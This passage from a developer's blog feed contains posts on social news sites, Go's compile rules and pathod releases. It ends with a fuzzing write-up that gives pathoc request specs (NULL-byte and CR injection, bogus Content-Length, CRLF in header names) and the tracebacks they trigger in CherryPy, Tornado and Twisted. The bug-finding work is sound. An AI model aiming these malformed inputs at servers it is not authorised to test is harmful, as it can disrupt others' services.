subreddit system tries to improve this by allowing communities to self-assemble around interests, but the pinhole effect still dominates in busy subreddits like <a rel="external" href="http://reddit.com/r/programming">/r/programming</a>.</p> <h2 id="gaming-the-system">Gaming The System</h2> <p>Social news systems are eminently gameable, and cheating is rife. Part of the reason for this is that a story's destiny depends on a relatively small number of votes. If your story has any merit at all, you significantly increase the likelihood that it will end up on the front page by giving it a small nudge at the beginning of its life. If it has no merit whatsoever, you can still force it onto people's screens with a few tens or hundreds of votes. Conversely, you can use the same effect to censor and oppress views you disagree with if your social news site has downvotes. Anyone who's kept an eye on these things can rattle off examples of gaming in action: the <a rel="external" href="http://en.wikipedia.org/wiki/Digg_Patriots">voting rings</a>, the <a rel="external" href="http://www.reddit.com/r/reddit.com/comments/b7e25/today_i_learned_that_one_of_reddits_most_active/">"social media consultants"</a>, the <a rel="external" href="http://www.reddit.com/r/shitredditsays">vigilante thought-polizei</a>, the <a rel="external" href="http://www.reddit.com/comments/2n2tu/ron_paul_on_the_debate_my_opponents_called_for/c2n5v8">political operators</a>, and dozens of other types of manipulation and villainy. What's more - these visible scandals are just the tip of the iceberg. Eyeballs are valuable, and there's an active arms race with social news sites on the one side, and a dark army of spammers, scammers and true believers on the other. How much of what we see is affected by this type of cheating? We just don't know, but my suspicion is that the effect is significant.</p> <p>The point here is broader than any particular instance of gaming. It's that social news sites are structurally susceptible to manipulation in ways that can't be fixed without changing the core of their operation. A system like this might be good enough to deliver <a rel="external" href="http://knowyourmeme.com/memes/rage-comics">rage comics</a>, but I feel queasy trusting it any further.</p> <h2 id="community-collapse-disorder">Community Collapse Disorder</h2> <p>My final beef with social news is a problem that it shares with pretty much all online communities, especially technical ones. We're all familiar with the life-cycle of technical forums. They start with a small community of insiders who create value, which then attracts more people to participate, which then dilutes the quality of the contributions (and often introduces a few pathological bad actors), which then causes the good contributors to move on, which causes the magic well to dry up. Everyone then take their toys and move to the next community, and the cycle repeats. We saw this with Usenet and the original C2 wiki, and we are seeing it now with Hacker News and many technical subreddits all at various points in this life-cycle.</p> <p>I believe that Community Collapse Disorder is one of the Big Problems online that we don't yet have a satisfactory solution to. People are trying, though. Hacker News, for instance, seems to be rather <a rel="external" href="https://www.google.com/search?hl=en&amp;q=site%3Anews.ycombinator.com+%22eternal+september%22">poignantly aware of its own decline</a>, with some of the <a rel="external" href="http://al3x.net/2011/02/22/solving-the-hacker-news-problem.html">best of the old-timers calling for an alternative</a>. Paul Graham himself recognizes the issue, and has been tweaking things in various ways to combat the phenomenon, without much success.</p> <p>At the moment, we just don't know how to build online communities that are both inclusive and stable. Democracy, here, seems to lead inevitably to decline, and social news sites are no exception.</p> <h2 id="a-better-way-forward">A better way forward?</h2> <p>A big part of the reason I don't use social news anymore is that my existing social networks have become so much more effective at turning up good content. The absolute best source of news for me is simply the set of links shared by the folks I follow on <a rel="external" href="http://twitter.com/cortesi">Twitter</a>. I follow people who post interesting content, and whom I trust to act as information filters for me. Most of them share my technical interests, but some are interesting because they are from my home town, or because they share some more esoteric pursuit with me. So, the news stream I see is exactly tailored to me. At the same time, there is also room idiosyncrasy - if someone I follow shares something left-field that tickles their fancy, I'll see it. In turn, I try to be a responsible information filter for those who follow me - I find a link or two worth tweeting on most days.</p> <p>There are still things I miss - Twitter is great for sharing links, but is an awful medium for technical discussion. <a rel="external" href="https://plus.google.com/106243676845481872244">Google+</a> could be a better alternative, but just doesn't seem to have achieved liftoff for me. I would also love better tools for aggregating and harvesting links from my social network. At the moment I use <a rel="external" href="http://flipboard.com">Flipboard</a> and <a rel="external" href="http://getprismatic.com">Prismatic</a>, but I have issues with both. On the whole, though, these are quibbles. It seems to me that using social networks to filter news is a better way forward - if I was tackling the social news problem, I'd be building tools to support this process.</p> Go: a nice language with an annoying personality 2013-01-18T00:00:00+00:00 2013-01-18T00:00:00+00:00 https://corte.si/posts/code/go/go-rant/ <p>Last week, I had the pleasure of attending <a rel="external" href="http://dropbox.com">Dropbox</a>'s annual company <a rel="external" href="https://blog.dropbox.com/2012/03/hack-week-ii/">hack fest</a>. It was a great opportunity to get a look at how Dropbox works internally, and mingle with the smart and driven folks who make one of my favourite products. In the spirit of hack week, me and my friend <a rel="external" href="http://twitter.com/alexdong">@alexdong</a> decided to do our project in Go. We'd both wanted to explore the language, but had never quite been able to make time - a week-long code holiday seemed to be the perfect opportunity. I was hopeful that Go would turn out to hit a magical sweet spot: a light set of abstractions hugging close to the machine, while still providing the indoor plumbing and civilized conveniences of life that I had grown used to with languages like Python. Five days of furious hacking later, I can report that Go might well deliver on this promise, but has enough annoying personality quirks that I will think twice about basing any more projects on it.</p> <p>My main beef with Go has nothing to do with fundamental language design, and may seem almost inconsequential at first glance. The Go compiler treats unused module imports and declared variables as compile errors. This is great in theory and is something you might well want to enforce before code can be committed, but during the actual <em>process</em> of producing code it's nothing but an irksome, unnecessary pain in the ass. Let's look at a concrete example, starting with a snippet of code as follows <sup class="footnote-reference"><a href="#1">1</a></sup></p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> m, err</span><span style="color: #D73A49;"> :=</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> DoSomething</span><span>(m)</span></span></code></pre> <p>I'm a firm believer that printing stuff to screen is a programmer's best debugging tool, so say we're hacking away and want to print the value of <strong>m</strong> while running our unit tests. We change the code as follows, adding an import for the "fmt" module and a call to Print:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">fmt</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> m, err</span><span style="color: #D73A49;"> :=</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span> fmt.</span><span style="color: #6F42C1;">Print</span><span>(m)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> DoSomething</span><span>(m)</span></span></code></pre> <p>Now we keep hacking, and want to comment out the print statement for a moment like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">fmt</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> m, err</span><span style="color: #D73A49;"> :=</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #6A737D;"> //fmt.Print(m)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> DoSomething</span><span>(m)</span></span></code></pre> <p>This is a compile error. We have to switch contexts, move to the top of the module, also comment out the import, and then move back to the spot we're really hacking on:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span style="color: #6A737D;"> //&quot;fmt&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> m, err</span><span style="color: #D73A49;"> :=</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #6A737D;"> //fmt.Print(m)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> DoSomething</span><span>(m)</span></span></code></pre> <p>A few seconds later, we want to re-enable the Print statement - so up we go again to the top of the module to re-enable the import. This is even worse when we want to, say, comment out the <strong>DoSomething</strong> call while hacking:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> m, err</span><span style="color: #D73A49;"> :=</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6A737D;"> //DoSomething(m)</span></span></code></pre> <p>This is also a compile error because now <em>m</em> is unused. We have to hunt up in our code to find the declaration, which could be explicit or implicit using an <strong>:=</strong> assignment. So, in this case we find the declaration, and use the magic underscore name to throw the offending value away:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> _, err</span><span style="color: #D73A49;"> :=</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6A737D;"> //DoSomething(m)</span></span></code></pre> <p>That should fix it, right? Well, no. It turns out we've previously declared and used <strong>err</strong> (a very common idiom), so this is still a compile error. We're using the "declare and assign" syntax, but have no new variables on the left-hand side of the ":=". So we need to make another tweak:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> _, err</span><span style="color: #D73A49;"> =</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6A737D;"> //DoSomething(m)</span></span></code></pre> <p>Five seconds later, we want to re-enable <strong>DoSomething</strong>, and now we have to unwind the entire process.</p> <p>The cumulative effect of all this is like trying to write code while someone next to you randomly knocks your hands off the keyboard every few seconds. It's a pointlessly pedantic approach that adds constant friction to your write-compile-test cycle, breaks your flow, and just generally makes life a little harder for very little benefit. There's no way to turn this mis-feature off, no flag we can pass to the compiler to temporarily make this a warning rather than an error while hacking<sup class="footnote-reference"><a href="#2">2</a></sup>.</p> <p>The irony of the situation is that I agree with the sentiment behind this. I don't want dangling variables or imports in my codebase. And I agree that if something is worth warning about it's worth making it an error. The mistake is to confuse the state we want at the conclusion of a unit of hacking<sup class="footnote-reference"><a href="#3">3</a></sup>, with what we need at every point in between, during the write-compile-test cycle. This cycle is the core of the process of actually producing code, and the <a rel="external" href="http://xkcd.com/353/">exhilarating sense of weightlessness</a> that you get when hacking in Python is largely due to the fact that the language works really, really hard to optimize this process. Go has given away this feeling of exhilaration, basically for nothing.</p> <p>Despite all this, it's still possible that the benefits of Go do outweigh its irritating personality. Interfaces, memory management, first-class concurrency and static type checking is a knockout combination, and the language in general has something of the taut practicality that I love in C. So, despite the rantiness of this post, I'll keep hacking on our project and make sure I produce a few thousand more lines of code before making a final call on the language. Look for a project release and a blog post along these lines in the coming months.</p> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>Ellipses indicate "an arbitrary amount of intervening code"</p> </div> <div class="footnote-definition" id="2"><sup class="footnote-definition-label">2</sup> <p>I edited this paragraph a bit for tone. I originally accused the Go documentation of being faintly smug about all of this - which is not fair, and doesn't add anything to the argument.</p> </div> <div class="footnote-definition" id="3"><sup class="footnote-definition-label">3</sup> <p>Why don't we have a word for this? By "unit of hacking", I mean the work that goes on between starting to hack on a change-set and doing a commit. At the beginning and at the end, the code is in a clean state, but in between there are many periods of transition where cleanliness requirements are relaxed.</p> </div> Released: pathod 0.3 2012-11-16T00:00:00+00:00 2012-11-16T00:00:00+00:00 https://corte.si/posts/code/pathod/announce0_3/ <p>I've just released <a rel="external" href="http://pathod.net">pathod 0.3</a>, which beefs up <a rel="external" href="http://pathod.net/docs/pathoc">pathoc</a>'s fuzzing capabilities, improves the spec language and includes lots of bugfixes and other small tweaks. Get it while it's hot!</p> <h2 id="better-fuzzing">Better fuzzing</h2> <p>A major focus of this release is to improve <a rel="external" href="http://pathod.net/docs/pathoc">pathoc</a>'s capabilities as a basic fuzzing tool. I've had fun <a href="https://corte.si/posts/code/pathod/pythonservers/">breaking webservers</a> with pathoc, and it's even come in handy in my Day Job. Here's a quick summary of how things have changed.</p> <ul> <li>The <strong>-x</strong> flag tells pathoc to explain its requests. This prints out an expanded pathoc query specification, with all randomly generated content and query modifications resolved. If you trigger an exception, you can precisely replay the offending query using this explanation.</li> <li>The options for outputting requests and responses have been expanded hugely. First, the <strong>-q</strong> and <strong>-r</strong> flags tell pathoc to dump complete records of requests and responses respectively. This data is sniffed by instrumenting the socket, so is canonical regardless of our ability to interpret returned data. The <strong>-x</strong> option makes pathod dump this data in hexdump format (otherwise unprintable characters are escaped to preserve your terminal).</li> <li>A number of options have been added to let you ignore expected responses. <strong>-C</strong> takes a comma-separated list of response codes to ignore. <strong>-T</strong> ignores server timeouts. This lets you hone in on the exceptional responses that you care about, and ignore the rest.</li> </ul> <h2 id="language-improvements">Language improvements</h2> <ul> <li>I've simplified response specifications by making the response message a standard component with the "r" mnemonic.</li> <li>I've added the "u" mnemonic to request specifications, as a shortcut for specifying the User-Agent header:</li> </ul> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>get:/:u&quot;My Weird User-Agent&quot;</span></span></code></pre> <p>We also have a small library of representative User-Agent strings that can be used instead of specifying your own. For example, this specifies the GoogleBot User-Agent string:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>get:/:ug</span></span></code></pre> <p>The list of available shortcuts are in the docs, and can be listed from the commandline using the <strong>--show-uas</strong> flag to pathoc:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>&gt; ./pathoc --show-uas</span></span> <span class="giallo-l"><span>User agent strings:</span></span> <span class="giallo-l"><span> a android</span></span> <span class="giallo-l"><span> l blackberry</span></span> <span class="giallo-l"><span> b bingbot</span></span> <span class="giallo-l"><span> c chrome</span></span> <span class="giallo-l"><span> f firefox</span></span> <span class="giallo-l"><span> g googlebot</span></span> <span class="giallo-l"><span> i ie9</span></span> <span class="giallo-l"><span> p ipad</span></span> <span class="giallo-l"><span> h iphone</span></span> <span class="giallo-l"><span> s safari&lt;/pre&gt;</span></span></code></pre> pathoc: break all the Python webservers! 2012-09-27T00:00:00+00:00 2012-09-27T00:00:00+00:00 https://corte.si/posts/code/pathod/pythonservers/ <p>A few months ago, I announced <a rel="external" href="http://pathod.net">pathod</a>, a pathological HTTP daemon. The project started as a testing tool to let me craft standards-violating HTTP responses while working on <a rel="external" href="http://mitmproxy.org">mitmproxy</a>. It soon became a free-standing project, and has turned out to be incredibly useful in security testing, exploit delivery and general creative mischief. In the last release, I added pathoc - pathod's malicious client-side twin. It does for HTTP requests what pathod does for HTTP responses, and uses the same <a rel="external" href="http://pathod.net/docs/language">hyper-terse specification language</a>.</p> <p>In this post, I show how pathoc can be used as a very simple fuzzer, by finding issues in a number of major pure-Python webservers. None of the tested servers failed catastrophically - they all caught the unexpected exception and continued serving requests. None the less, I think it's reasonable to say that we've triggered a bug if a) the server returns an 500 Internal Server Error response or terminates the connection abnormally, and b) we see a traceback in our logs. In fact, by this definition, I found bugs in <em>every</em> pure-Python server I tested.</p> <p>All of the problems I list below are simple failures of validation - what they have in common is that somewhere in the project code is called with input that it doesn't expect and can't handle. This matters - in fact, I'd argue that the majority of security problems fall in this category. It's interesting to ponder why this type of issue is so ubiquitous in Python servers. I have no doubt that part the answer lies in Python's use of exceptions - errors that would be explicit in other languages can be implicit in Python, and code that seems clean and intuitive might in fact be buggy. I think this is especially relevant right now, given the recent flurry of discussion surrounding the <a rel="external" href="http://golang.org/">Go language</a> and its error handling. It's pretty instructive to read Russ Cox's <a rel="external" href="https://plus.google.com/116810148281701144465/posts/iqAiKAwP6Ce">recent riposte</a> to <a rel="external" href="http://uberpython.wordpress.com/2012/09/23/why-im-not-leaving-python-for-go/">this post</a> criticizing Go's explicit approach, while looking at the bugs below. <a rel="external" href="https://github.com/cortesi">I love Python</a> and I think it's a fine language, but I also think the designers of Go probably made the right choice.</p> <h2 id="basic-fuzzing-with-pathoc">Basic fuzzing with pathoc</h2> <p>My methodology for these tests was very simple indeed. I launched each server in turn, and used pathod to fire corrupted GET requests at the daemon until I saw an error. I then looked at the logs, and boiled the distinct cases down to a minimal pathoc specification by hand. This exercises a rather shallow set of features in the server software - mostly parsing of the HTTP lead-in and request headers. It's possible to give software a much, much deeper workout with pathoc, but I'll leave that for a future post.</p> <p>My pathoc fuzzing command looked something like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -n 1000 -p 8080 -t 1</span><span style="color: #032F62;"> localhost &#39;get:/:b@10:ir,&quot;\x00&quot;&#39;</span></span></code></pre> <p>The most important flags here are <b>-n</b>, which tells pathoc to make 1000 consecutive requests, and <b>-t</b>, which tells pathoc to time out after one second (necessary to prevent hangs when daemons terminate improperly). The request specification itself breaks down as follows:</p> <table class="table"> <tr> <td>get</td> <td>Issue a GET request</td> </tr> <tr> <td>/</td> <td>... to the path / </td> </tr> <tr> <td>b@10</td> <td>... with a body consisting of 10 random bytes </td> </tr> <tr> <td>ir,"\x00"</td> <td>... and inject a NULL byte at a random location.</td> </tr> </table> <p>It's that last clause - the random injection - that makes the difference between simply crafting requests and basic fuzzing. Every time a new request is issued, the injection occurs at a different location. I varied the injected character between a NULL byte, a carriage return and a random alphabet letter. Each exposed different errors in different servers. For a complete description of the specification language, see the <a rel="external" href="http://pathod.net/docs/language">online docs</a>.</p> <h2 id="results">Results</h2> <p>For each bug, I've given a traceback and a minimal pathoc call to trigger the issue. The tracebacks have been edited lightly to shorten file paths and remove irrelevances like timestamps.</p> <h3 id="cherrypy">CherryPy</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:b@10:h&quot;Content-Length&quot;=&quot;x&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>ENGINE ValueError(&quot;invalid literal for int() with base 10: &#39;x&#39;&quot;,)</span></span> <span class="giallo-l"><span>Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;cherrypy/wsgiserver/wsgiserver2.py&quot;, line 1292, in communicate</span></span> <span class="giallo-l"><span> req.parse_request()</span></span> <span class="giallo-l"><span> File &quot;cherrypy/wsgiserver/wsgiserver2.py&quot;, line 591, in parse_request</span></span> <span class="giallo-l"><span> success = self.read_request_headers()</span></span> <span class="giallo-l"><span> File &quot;cherrypy/wsgiserver/wsgiserver2.py&quot;, line 711, in read_request_headers</span></span> <span class="giallo-l"><span> if mrbs and int(self.inheaders.get(&quot;Content-Length&quot;, 0)) &gt; mrbs:</span></span> <span class="giallo-l"><span>ValueError: invalid literal for int() with base 10: &#39;x&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:i4,&quot;\r&quot;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>ENGINE TypeError(&quot;argument of type &#39;NoneType&#39; is not iterable&quot;,)</span></span> <span class="giallo-l"><span>Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;cherrypy/wsgiserver/wsgiserver2.py&quot;, line 1292, in communicate</span></span> <span class="giallo-l"><span> req.parse_request()</span></span> <span class="giallo-l"><span> File &quot;cherrypy/wsgiserver/wsgiserver2.py&quot;, line 580, in parse_request</span></span> <span class="giallo-l"><span> success = self.read_request_line()</span></span> <span class="giallo-l"><span> File &quot;cherrypy/wsgiserver/wsgiserver2.py&quot;, line 644, in read_request_line</span></span> <span class="giallo-l"><span> if NUMBER_SIGN in path:</span></span> <span class="giallo-l"><span>TypeError: argument of type &#39;NoneType&#39; is not iterable</span></span></code></pre><h3 id="tornado">Tornado</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:b@10:h&quot;Content-Length&quot;=&quot;x&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>[E 120927 11:42:26 iostream:307] Uncaught exception, closing connection.</span></span> <span class="giallo-l"><span> Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;tornado/iostream.py&quot;, line 304, in wrapper</span></span> <span class="giallo-l"><span> callback(*args)</span></span> <span class="giallo-l"><span> File &quot;tornado/httpserver.py&quot;, line 254, in _on_headers</span></span> <span class="giallo-l"><span> content_length = int(content_length)</span></span> <span class="giallo-l"><span> ValueError: invalid literal for int() with base 10: &#39;x&#39;</span></span> <span class="giallo-l"><span>[E 120927 11:42:26 ioloop:435] Exception in callback &lt;tornado.stack_context._StackContextWrapper object at 0x1012e28e8&gt;</span></span> <span class="giallo-l"><span> Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;tornado/ioloop.py&quot;, line 421, in _run_callback</span></span> <span class="giallo-l"><span> callback()</span></span> <span class="giallo-l"><span> File &quot;tornado/iostream.py&quot;, line 304, in wrapper</span></span> <span class="giallo-l"><span> callback(*args)</span></span> <span class="giallo-l"><span> File &quot;tornado/httpserver.py&quot;, line 254, in _on_headers</span></span> <span class="giallo-l"><span> content_length = int(content_length)</span></span> <span class="giallo-l"><span> ValueError: invalid literal for int() with base 10: &#39;x&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:h&quot;h\r\n&quot;=&quot;x&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>[E iostream:307] Uncaught exception, closing connection.</span></span> <span class="giallo-l"><span> Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;tornado/iostream.py&quot;, line 304, in wrapper</span></span> <span class="giallo-l"><span> callback(*args)</span></span> <span class="giallo-l"><span> File &quot;tornado/httpserver.py&quot;, line 236, in _on_headers</span></span> <span class="giallo-l"><span> headers = httputil.HTTPHeaders.parse(data[eol:])</span></span> <span class="giallo-l"><span> File &quot;tornado/httputil.py&quot;, line 127, in parse</span></span> <span class="giallo-l"><span> h.parse_line(line)</span></span> <span class="giallo-l"><span> File &quot;tornado/httputil.py&quot;, line 113, in parse_line</span></span> <span class="giallo-l"><span> name, value = line.split(&quot;:&quot;, 1)</span></span> <span class="giallo-l"><span> ValueError: need more than 1 value to unpack</span></span> <span class="giallo-l"><span>[E ioloop:435] Exception in callback &lt;tornado.stack_context._StackContextWrapper object at 0x1012bd7e0&gt;</span></span> <span class="giallo-l"><span> Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;tornado/ioloop.py&quot;, line 421, in _run_callback</span></span> <span class="giallo-l"><span> callback()</span></span> <span class="giallo-l"><span> File &quot;tornado/iostream.py&quot;, line 304, in wrapper</span></span> <span class="giallo-l"><span> callback(*args)</span></span> <span class="giallo-l"><span> File &quot;tornado/httpserver.py&quot;, line 236, in _on_headers</span></span> <span class="giallo-l"><span> headers = httputil.HTTPHeaders.parse(data[eol:])</span></span> <span class="giallo-l"><span> File &quot;tornado/httputil.py&quot;, line 127, in parse</span></span> <span class="giallo-l"><span> h.parse_line(line)</span></span> <span class="giallo-l"><span> File &quot;tornado/httputil.py&quot;, line 113, in parse_line</span></span> <span class="giallo-l"><span> name, value = line.split(&quot;:&quot;, 1)</span></span> <span class="giallo-l"><span> ValueError: need more than 1 value to unpack</span></span></code></pre><h2 id="twisted">Twisted</h2> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:b@10:h&quot;Content-Length&quot;=&quot;x&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>[HTTPChannel,4,127.0.0.1] Unhandled Error</span></span> <span class="giallo-l"><span> Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;twisted/python/log.py&quot;, line 84, in callWithLogger</span></span> <span class="giallo-l"><span> return callWithContext({&quot;system&quot;: lp}, func, *args, **kw)</span></span> <span class="giallo-l"><span> File &quot;twisted/python/log.py&quot;, line 69, in 